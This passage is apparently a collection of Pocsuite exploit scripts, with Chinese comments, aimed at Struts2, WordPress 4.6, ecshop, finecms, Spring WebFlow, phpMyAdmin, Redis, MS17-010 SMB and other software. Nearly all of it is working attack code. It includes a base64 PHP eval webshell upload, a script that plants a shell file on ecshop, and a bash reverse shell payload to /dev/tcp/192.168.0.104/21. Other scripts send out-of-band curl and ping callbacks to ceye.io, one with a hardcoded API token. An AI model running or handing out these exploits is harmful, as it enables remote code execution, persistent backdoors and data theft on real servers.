    appPowerLink = 'https://invisionpower.com/'
    appName = 'IPS Community Suite'
    appVersion = '<=4.1.12.3'
    vulType = 'Code Execution'
    desc =  '''
            Parameter filter is not strict resulting Code Execution.
            '''
    samples = []
    install_requires = []

    def _verify(self):
        result = {}
        url_part = self.url.rpartition('/')
        random_sed = string.letters+string.digits
        flag = ''.join([random.choice(random_sed) for _ in range(10)])
        payload = "/index.php?app=core&module=system&controller=content&do=find&content_class=cms\\Fields1{}echo%20" + "md5(" + flag + ");/*"
        
        target_url = self.url + payload
        target_rep = req.get(target_url)

        while target_rep.status_code == 200:
            
            flag_hash = hashlib.md5(flag).hexdigest()
            if flag_hash in target_rep.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = target_url
                break

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)


#!/usr/bin/env python
# -*- coding: utf-8 -*-

import urlparse

from pocsuite.api.poc import POCBase, register, Output
from pocsuite.api.request import req


class TestPOC(POCBase):
    vulID = ''
    version = '1'
    author = 'elloit'
    vulDate = ''
    createDate = ''
    updateDate = ''
    references = ['https://xz.aliyun.com/t/4315']
    name = 'ourphp 后门漏洞'
    appPowerLink = 'http://www.ourphp.net'
    appName = 'ourphp'
    appVersion = 'v1.7.5-v1.8.3'
    vulType = '后门'
    desc = r'''
    在function\editor\php\upload_json.php 中会暴露出生成的校验码，导致口令码和校验码泄露。
    在http://localhost:88/client/manage/ourphp_filebox.php?op=home&folder=./&validation=12345&code=QZRdvlYHlDUgqZubIGV9Mx46JCqmDNkmYHlDUg
    处，将泄露的口令码和 校验码 + 校验码第七位到第十二位之间的部分， 即可通过验证，对网站文件进行管理。
    '''
    samples = [
        "https://123.207.235.207"
    ]
    install_requires = ""
    search_keyword = '"Powered by ourphp"'

    def _verify(self):
        result = {}
        # 格式化URL
        url = urlparse.urlparse(self.url)
        vul_url = url.scheme + "://" + url.netloc + "/function/editor/php/upload_json.php?upload_file=hola"
        try:
            res = req.get(url=vul_url, timeout=(10, 15), verify=False)
            if res.status_code == 200:
                text = res.text.replace("<!--", "")
                text = text.replace("-->", "")
                validation = text.split("||")[0]
                safecode = text.split("||")[1]
                vul_url_check = url.scheme + "://" + url.netloc + \
                                "/client/manage/ourphp_filebox.php?op=home&folder=./&validation=" + validation + \
                                "&code=" + safecode + safecode[6:12]
                res_check = req.get(url=vul_url_check, timeout=(10, 15), verify=False)
                if res_check.status_code == 200 and "重命名" in res_check.content:
                    result["VerifyInfo"] = {}
                    result["VerifyInfo"]["URL"] = self.url
                    result["extra"] = {}
                    result["extra"]["validation"] = validation
                    result["extra"]["safecode"] = safecode
                    result["extra"]["info"] = self.get_info()
        except Exception as e:
            return self.parse_output(result)

        return self.parse_output(result)

    def _attack(self):
        self._verify()

    def get_info(self):
        try:
            page = req.get(self.url, timeout=(10, 15), verify=False).text
            title_left_index = page.find("<title>")
            title_right_index = page.find("</title>")
            title = page[title_left_index + 7:title_right_index].strip()
        except:
            return ""
        return title

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8

import urllib
import random
import string
from collections import OrderedDict

from pocsuite.api.request import req  #用法和 requests 完全相同
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import sys
# import requests
# from poster.encode import multipart_encode
# from poster.streaminghttp import register_openers
# cmd= sys.argv[2]

class TestPOC(POCBase):
    vulID = '1571'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  #默认为1
    author = 'lyb'  #  PoC作者的大名
    vulDate = '2018/4/7'  #漏洞公开的时间,不知道就写今天
    createDate = '2018/3/7'  # 编写 PoC 的日期
    updateDate = '2018/3/7'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://www.seebug.org/vuldb/ssvid-92746']  # 漏洞地址来源,0day不用写
    name = 'struts2-045 命令执行 PoC'  # PoC 名称
    appPowerLink = 'https://www.seebug.org/'  # 漏洞厂商主页地址
    appName = 'struts2'  # 漏洞应用名称
    appVersion = '<2.3.32'  # 漏洞影响版本
    vulType = 'Command Execution'  #漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        基于 Jakarta plugin插件的Struts远程代码执行漏洞，恶意用户可在上传文件时通过修改 HTTP请求头中的 Content-Type 值来触发该 漏洞，进而执行系统命令。
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写

    def _attack(self):
        '''attack mode'''
        return self._verify()
    def _verify(self,verify=True):
        result={}
        vul_url=self.url
        payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
        headers = {}
        headers["Content-Type"] = payload
        r = req.get(vul_url, headers=headers)
        if "105059592" in r.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)



#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

import requests

'''
原始利用链接：
/tags.php?tag="><script>prompt(/SEBUG@TEST/)</script>
'''

class TestPOC(POCBase):
    vulID = '26119'  # ssvid
    version = '1.0'
    author = ['XXXX']
    vulDate = ''
    createDate = '2016-01-25'
    updateDate = '2016-01-25'
    references = ['http://www.seebug.org/vuldb/ssvid-26119']
    name = 'MyBB 1.6.5 suffers from a cross site scripting vulnerability'
    appPowerLink = 'http://www.mybboard.net/'
    appName = 'MyBB'
    appVersion = '1.6.5'
    vulType = 'XSS'
    desc = '''
    MyBB 1.6.5 tags.php 存在跨站脚本漏洞
    '''
    samples = ['']
    
    def _verify(self):
        result = {}

        # 较之前poc加入rstip()使URL规范化
        # 使用prompt(/SEBUG@TEST/)替代prompt("SEBUG@TEST"),因为发现有的网站会转义双引号
        vulurl = self.url.rstrip('/') + '/tags.php?tag="><script>prompt(/SEBUG@TEST/)</script>'

        # 较之前poc加入异常处理机制
        try:
            # 较之前poc加入过期时间，禁用SSL证书认证：降低等待时间、排除SSL认证失败错误
            r = requests.get(vulurl,timeout=15,verify=False)
            if '<script>prompt(/SEBUG@TEST/)</script>' in r.content:
                result['XSSInfo'] = {}
                result['XSSInfo']['URL'] = r.url
        except Exception, e:
            raise e

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author  : jeffzhang
# @Time    : 2018/04/19
# @File    : _170605_SMB_ms17_010_RCE.py
# @Desc    : ""

import binascii
import socket
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '00005'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2017-05-12'
    createDate = '2018-04-19'
    updateDate = '2018-04-19'
    references = ['']
    name = 'MS17-010 SMB RCE'
    appPowerLink = 'https://www.microsoft.com'
    appName = 'SMB Server'
    appVersion = 'All'
    vulType = 'RCE'
    desc = '''
            SMB Server存在多个远程执行代码漏洞 成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力
    '''
    samples = ['']

    def _verify(self):
        result = {}
        target_ip = self.url.split(':')[1].strip('/')
        if len(self.url.split(':')) > 2:
            target_port = int(self.url.split(':')[2].strip('/'))
        else:
            target_port = 445
        negotiate_protocol_request = binascii.unhexlify("00000054ff534d4272000000001801280000000000000000000000000000"
                                                        "2f4b0000c55e003100024c414e4d414e312e3000024c4d312e3258303032"
                                                        "00024e54204c414e4d414e20312e3000024e54204c4d20302e313200")

        session_setup_request = binascii.unhexlify("00000063ff534d42730000000018012000000000000000000000000000002f4b0"
                                                   "000c55e0dff000000dfff02000100000000000000000000000000400000002600"
                                                   "002e0057696e646f7773203230303020323139350057696e646f7773203230303"
                                                   "020352e3000")
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((target_ip, target_port))
            s.send(negotiate_protocol_request)
            s.recv(1024)
            s.send(session_setup_request)
            data = s.recv(1024)
            user_id = data[32:34]
            tree_connect_andx_request = "000000%xff534d42750000000018012000000000000000000000000000002f4b%sc55e04ff00" \
                                        "0000000001001a00005c5c%s5c49504324003f3f3f3f3f00" % (
            (58 + len(target_ip)), user_id.encode('hex'), target_ip.encode('hex'))
            s.send(binascii.unhexlify(tree_connect_andx_request))
            data = s.recv(1024)
            all_id = data[28:36]
            payload = "0000004aff534d422500000000180128000000000000000000000000%s1000000000ffffffff000000000000000000" \
                      "0000004a0000004a0002002300000007005c504950455c00" % all_id.encode('hex')
            s.send(binascii.unhexlify(payload))
            data = s.recv(1024)
            s.close()
            if "\x05\x02\x00\xc0" in data:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Payload'] = payload[:20]
                result['VerifyInfo']['result'] = data[:20]
        except Exception as e:
            pass
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet noting return')
        return output


register(TestPOC)


#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

def post_url(url, data, refer):
    try:
        httpreq = req.Session()
        headers = {
        "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": "refer"
        }
        resp = httpreq.post(url, data=data)
    except Exception as ex:
        resp = None
    return resp

class TestPOC(POCBase):
    name = 'finecms5.0.6 file-upload Vulnerability'
    vulID = '0'
    author = ['cws6']
    vulType = 'file-upload'
    version = '1'
    references = ['https://cloud.tencent.com/developer/article/1144917']
    desc = '''finecms5.0.6 /finecms/dayrui/controllers/Api.php的data2()存在任意文件上传'''

    vulDate = '2018-05-21'
    createDate = '2019-04-25'
    updateDate = '2019-04-25'

    appName = 'finecms'
    appVersion = '5.0.6'
    appPowerLink = 'http://www.finecms.net/'
    samples = ['re']

    
    def _attack(self):
        """attack mode"""
        result = {}
        payload1 = '/index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar'
        data = {
        "uid": "1",
        "file": "data:image/php;base64,PD9waHAKaWdub3JlX3VzZXJfYWJvcnQodHJ1ZSk7CnNldF90aW1lX2xpbWl0KDApOwp1bmxpbmsoX19GSUxFX18pOwokZmlsZSA9ICcyLnBocCc7CiRjb2RlID0gJzw/cGhwIGlmKG1kNSgkX0dFVFsicGFzcyJdKT09IjFhMWRjOTFjOTA3MzI1YzY5MjcxZGRmMGM5NDRiYzcyIil7QGV2YWwoJF9QT1NUW2FdKTt9ID8+JzsKd2hpbGUgKDEpewogICAgZmlsZV9wdXRfY29udGVudHMoJGZpbGUsJGNvZGUpOwogICAgdXNsZWVwKDUwMDApOwp9",
        }
        refer = self.url
        resp = post_url(self.url + payload1,data,refer)
        resp1 = req.get(self.url + '/uploadfile/member/1/0x0.php')
        time.sleep(1)
        if 'phpinfo' in resp1.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def _verify(self):
        """verify mode"""
        result = {}
        payload1 = '/index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar'
        data = {
        "uid": "123",
        "file": "data:image/php;base64,PD9waHAgZWNobyAiT0tPS09LIjs/Pg==",
        }
        refer = self.url
        resp = post_url(self.url + payload1,data,refer)
        resp1 = req.get(self.url + '/uploadfile/member/123/0x0.php')
        time.sleep(1)
        if 'OKOKOK' in resp1.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/python
# -*- coding: utf-8 -*-


# If you have issues about development, please read:
# https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md
# https://github.com/knownsec/Pocsuite/blob/master/docs/COPYING

import string
import random
import time
from pocsuite.api.request import req
from pocsuite.api.poc import POCBase, Output
from pocsuite.api.poc import register


def prep_host_header(cmd):
    """
    target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}rce}} null)
    /usr/bin/curl -o/tmp/rce $rev_host/rce.txt
    """
    rce_cmd = "${run{%s}}" % cmd
    rce_cmd = rce_cmd.replace('/', '${substr{0}{1}{$spool_directory}}')
    rce_cmd = rce_cmd.replace(' ', '${substr{10}{1}{$tod_log}}')
    rce_cmd = 'target(any -froot@localhost -be %s null)' % rce_cmd
    return rce_cmd


def send_command(url, cmd):
    try:
        httpreq = req.Session()
        headers = {'Content-Type': 'application/x-www-form-urlencoded',
                   'User-Agent': 'GoogleSpider',
                   'Host': prep_host_header(cmd)
                   }
        data = 'user_login=admin&wp-submit=Get+New+Password'
        resp = httpreq.post(url, headers=headers, data=data)
    except Exception as ex:
        resp = None
    return resp


class TestPOC(POCBase):
    name = 'WordPress Core 4.6 - Unauthenticated Remote Code Execution'
    vulID = '93077'  # https://www.seebug.org/vuldb/ssvid-93077
    author = ['isqlmap']
    vulType = 'cmd-exec'
    version = '1.0'    # default version: 1.0
    references = ['https://legalhackers.com']
    desc = '''WordPress Core 4.6 - Unauthenticated Remote Code Execution (RCE) 
    PoC Exploit (default configuration, no plugins, no auth)'''

    vulDate = '2013-02-14'
    createDate = '2017-05-03'
    updateDate = '2017-05-04'

    appName = 'WordPress'
    appVersion = '4.6'
    appPowerLink = 'https://wordpress.org'
    samples = ['']

    def verify_result(self, flag):
        url = "http://ceye.io/api/record?token=[YOUR CEYE TOKEN]&type=request&filter=wordpress"
        match_string = "wordpress.YOU-CEYE-ACCOUNT.ceye.io/{0}".format(flag)
        try:
            resp = req.get(url, timeout=30)
            if resp.content:
                if match_string in resp.content:
                    return True
        except Exception:
            pass
        return False

    def _attack(self):
        """attack mode"""
        return self._verify()

    def _verify(self):
        """verify mode"""
        result = {}
        self.url = self.url + '/wp-login.php?action=lostpassword'
        flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
        flag = flag.lower()
        cmd = "/usr/bin/curl wordpress.YOU-CEYE-ACCOUNT.ceye.io/{0}".format(flag)
        resp = send_command(self.url, cmd)
        time.sleep(2)
        if self.verify_result(flag):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)


__title__ = 'cvpoc'
__version__ = '1.0.1'
__author__ = 'CV Team'
__author_email__ = '943738808@qq.com'
__license__ = 'GPL 2.0'
__copyright__ = 'Copyright 2020 CV'
__name__ = 'cvpoc'
__package__ = 'cvpoc'

def start():
    print("import successful")


from .lib.core.common import set_paths
from .cli import module_path

set_paths(module_path())



#!/usr/bin/python
# -*- coding: utf-8 -*-
# from pocsuite.api.request import req #用法和 requests 完全相同
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register

headers = {'user-agent': 'ceshi/0.0.1', 'content-type': 'text/xml'}
poc_str = '''oauth/authorize?client_id=client&response_type=code&redirect_uri=http://www.github.com/chybeta&scope=%24%7BT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22calc.exe%22%29%7D'''


def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += poc_str
    try:
        res = req.get(url, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response


class TestPOC(POCBase):
    name = 'spring_security_oauth_RCE-2018-1260'
    vulID = 'CVE-2018-1260'  # https://www.seebug.org/vuldb/ssvid-97287
    author = ['debug']
    vulType = 'RCE'
    version = '1.0'  # default version: 1.0
    references = ['https://www.codercto.com/a/20129.html']
    desc = '''
		   Spring Security OAuth，2.3.3之前的2.3版和2.2.2之前的2.2和2.1.2之前的2.1和2.0.15之前的2.0以及较旧的
           不受支持的版本包含一个远程代码执行漏洞。恶意用户或攻击者可以向授权端点提出授权请求，
           当资源所有者转发到批准端点时，授权请求可能导致远程执行代码。
		   '''
    vulDate = '2020-02-10'
    createDate = '2020-02-10'
    updateDate = '2020-02-13'
    appName = 'Spring Security OAuth'
    appVersion = '2.3 to 2.3.3,2.2 to 2.2.2,2.0 to 2.0.152.1 to 2.1.2'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if 'Login with Username and Password' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + 'Spring Security Oauth_RCE-2018-1260' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = '00002'
    version = '1'
    author = 'jeffzhang'
    vulDate = '2017-08-15'
    createDate = '2017-08-15'
    updateDate = '2017-08-15'
    references = [
        'http://blog.knownsec.com/2015/11/\
        analysis-of-redis-unauthorized-of-expolit/']
    name = 'Redis 未授权访问'
    appPowerLink = 'https://www.redis.io'
    appName = 'Redis'
    appVersion = 'All'
    vulType = VUL_TYPE.UNAUTHORIZED_ACCESS
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
            redis 默认没有开启相关认证，黑客直接访问即可获取数据库中所有信息。
    '''
    samples = ['128.36.23.111']

    def _verify(self):
        result = {}
        payload = b'\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [6379, 16379, 26379]
        for port in ports:
            try:
                s = socket.socket()
                s.connect((pr.hostname, port))
                s.send(payload)
                data = s.recv(4096)
                if data and b'redis_version' in data:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = '{}:{}'.format(
                        pr.hostname, port)
                    result['extra'] = {}
                    result['extra']['evidence'] = data.decode('utf-8')
                    break
            except:
                #raise
                pass
            finally:
                s.close()

        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("not vulnerability")
        return output


register_poc(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

import socket
import urlparse

from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output
from pocsuite.api.poc import POCBase
from pocsuite.api.utils import url2ip


def check_tls(host, port):
    """
    params:
        host[str]: target host ip
        port[int]: target host port
    """
    client_hello = '16030100d8010000d403037d408377c8e5204623867604ab0ee4a140043a4e383f770a1e6b66c2d45d34e820de8656a211d79fa9809e9ae6404bb7bcc372afcdd6f51882e39ac2241a8535090016c02bc02fc00ac009c013c01400330039002f0035000a0100007500000014001200000f7777772e65746973616c61742e6567ff01000100000a00080006001700180019000b00020100002300003374000000100017001502683208737064792f332e3108687474702f312e31000500050100000000000d001600140401050106010201040305030603020304020202'

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(8)
    s.connect((host, port))
    s.send(client_hello.decode('hex'))
    try:
        data = s.recv(1024*1024)
    except socket.timeout:
        data = ''

    if data:
        server_hello_len = int(data[3:5].encode('hex'),16)
        index = 5
        index += server_hello_len
        cert_msg = data[index:]

        return cert_msg


def check_drown(host, port):
    """
    params:
        host[str]: target host ip
        port[int]: target host port
    """
    client_hello_payload = '803e0100020015001000100100800200800600400400800700c00800800500806161616161616161616161616161616161616161616161616161616161616161'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(8)
    s.connect((host, port))

    s.sendall(client_hello_payload.decode('hex'))
    try:
        server_hello = s.recv(10*1024)
    except socket.timeout:
        #print(" [-] Not connected SSLv2")
        return False
    except socket.error:
        return False

    try:
        # parse incoming packet to extract the certificate
        index = 0
        length = server_hello[index:index+2].encode('hex')
        index += 2
        msg_type = server_hello[index].encode('hex')
        index += 1
        session_id = server_hello[index].encode('hex')
        index += 1
        cert_type = server_hello[index].encode('hex')
        index += 1
        ssl_version = server_hello[index:index+2]
        index += 2
        cert_len = int(server_hello[index:index+2].encode('hex'),16)
        #print('cert_len', cert_len)
        index += 2
        cipher_spec_len = server_hello[index:index+2]
        index += 2
        conn_id = server_hello[index:index+2]
        index += 2
        cert = server_hello[index:cert_len+1]
        data = check_tls(host, port)
        if data:
            print(" [*] Check the TLS CERT and SSLv2 CERT")
            if cert.encode('hex') in data.encode('hex'):
                print(" [+] SSLv2 Enable - Same cert")
            else:
                print(" [+] SSLv2 Enable - Not same cert")
            return True
        else:
            return False
    except Exception as e:
        # most exception is "string index out of range"
        return False

    s.close()


class OpenSSL_DROWN(POCBase):
    vulID = '0'                 # vul ID
    version = '1'
    author = 'janes'
    vulDate = '2016-03-01'
    createDate = '2017-02-16'
    updateDate = '2017-02-16'
    references = ['https://www.openssl.org/blog/blog/2016/03/01/an-openssl-users-guide-to-drown/']
    name = 'OpenSSL Drown跨协议攻击TLS漏洞 POC'
    appPowerLink = 'https://www.openssl.org'
    appName = 'OpenSSL'
    appVersion = '1.0.2a, 1.0.1.m'
    vulType = 'Information Disclosure'
    desc = '''
        DROWN漏洞主要利用SSLv2协议的脆弱性对TLS协议进行攻击。攻击者通过中间人攻击等手段截获和解密用户和服务器之间的加密通信，包括但不限于用户名和密码、信用卡号、电子邮件、即时消息，以及敏感文件。
    '''
    samples = ['50.232.43.188']

    def _verify(self):
        result = {}
        output = Output(self)

        target_ip = url2ip(self.url)
        url = urlparse.urlparse(self.url)
        port = url.port or 443

        if check_drown(target_ip, port):
            output.success(result)
        else:
            output.fail('Not support SSLv2 connection. Not Vulnerable')
        return output

    def _attack(self):
        return self._verify()


register(OpenSSL_DROWN)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '0'
    version = '0'
    author = 'None'
    vulDate = 'None'
    createDate = 'None'
    updateDate = 'None'
    references = ['']
    name = 'ecshop 2.X 注入造成代码执行(getshell)'
    appPowerLink = 'None'
    appName = 'ecshop'
    appVersion = '2.X'
    vulType = 'SQL Injection and Code Execution'
    desc = '''
    	ecshop2.X版本造成注入和代码执行 在根目录下生成1.php 密码1337
    '''
    samples = ['']

    def _verify(self):
        try:
            result = {}
            headers={'Referer':'''554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:"'/*";}'''}
            att_url = self.url + "/user.php?act=login"
            response = req.get(att_url,headers=headers,timeout=10)

            res = req.get(self.url+"/1.php",timeout=10)
            if res.status_code == 200:
                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = self.url+"/1.php"
        except Exception,e:
            pass
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet noting return')
        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-
# from pocsuite.api.request import req #用法和 requests 完全相同
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register

headers = {
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
    'Cache-Control': 'max-age=0',
    'Upgrade-Insecure-Requests': '1',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Cookie': 'JSESSIONID=EB19A75A98344983B9018240B60EAD4D',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close'
    }
poc_str = '''_eventId_confirm=&_csrf=3bc3dd42-df01-43dc-a50c-39add3a54db3&_(new java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/192.168.0.104/21+0>%261")).start()=vulhub'''


def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/hotels/booking?execution=e1s2'
    try:
        res = req.post(url, data=poc_str, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response


class TestPOC(POCBase):
    name = 'spring_web_flow_RCE_CVE-2017-4971'
    vulID = 'CVE-2017-4971'  # https://www.seebug.org/vuldb/ssvid-93190
    author = ['debug']
    vulType = 'RCE'
    version = '1.0'  # default version: 1.0
    references = ['https://www.jianshu.com/p/ad391cb9a95b']
    desc = '''
		   Spring WebFlow 是一个适用于开发基于流程的应用程序的框架（如购物逻辑），
           可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中，
           如果我们控制了数据绑定时的field，将导致一个SpEL表达式注入漏洞，最终造成任意命令执行。
            参考链接：
            - https://threathunter.org/topic/593d562353ab369c55425a90
            - https://pivotal.io/security/cve-2017-4971
		   '''
    vulDate = '2020-02-07'
    createDate = '2020-02-07'
    updateDate = '2020-02-07'
    appName = 'SpringWebFlow'
    appVersion = '2.4.0 ~ 2.4.4'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if 'org.springframework.web.util.NestedServletException' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + ' SpringWebFlow_RCE_CVE-2017-4971' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
#_*_ encoding: utf-8 _*_
from pocsuite3.api import register_poc
from pocsuite3.api import Output
from pocsuite3.api import logger
from pocsuite3.api import POCBase
from collections import OrderedDict
from pocsuite3.api import OptString
from pocsuite3.api import requests
from pocsuite3.lib.utils import random_str

class PhpMyAdmin(POCBase):
    vulID = 'N/A'
    version = '1.0'
    author = 'big04dream'
    vulDate = ''
    createDate = '2019-11-13'
    updateDate = '2019-11-13'
    references = ['']
    name = 'phpMyAdmin 3.2 - "server_databases.php" Remote Command Execution (CVE-2008-4096)'
    appPowerLink = 'phpMyAdmin'
    appName = 'phpMyAdmin'
    appVersion = '<= 2.11.9.1'
    vulType = 'rce'
    desc = ''' 
    This issue affects versions prior to phpMyAdmin 2.11.9.1
    '''

    def _options(self):
        o = OrderedDict()
        o['token'] = OptString('', description='这个poc需要输入token', require=True)
        return o

    def _verify(self):
        result = {}
        token = self.get_option('token')
        cmd = random_str(16) + '.6eb4yw.ceye.io'
        cmd2 = 'ping ' + cmd
        payload = 'server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec("%s"); //&sort_order=desc&token=%s' % (cmd2, token)
        try:
            if self.url[-1] == '/':
                url = self.url + payload
            else:
                url = self.url + '/' + payload
            requests.get(url=url)
            res = requests.get('http://api.ceye.io/v1/records?token=2490ae17e5a04f03def427a596438995&type=dns')
            if cmd in res:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = payload
        except Exception as e:
            logger.info(e)
        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

register_poc(PhpMyAdmin)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '72776'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2011-11-29'
    createDate = '2016-01-24'
    updateDate = '2016-01-24'
    references = ['http://www.seebug.org/vuldb/ssvid-72776']
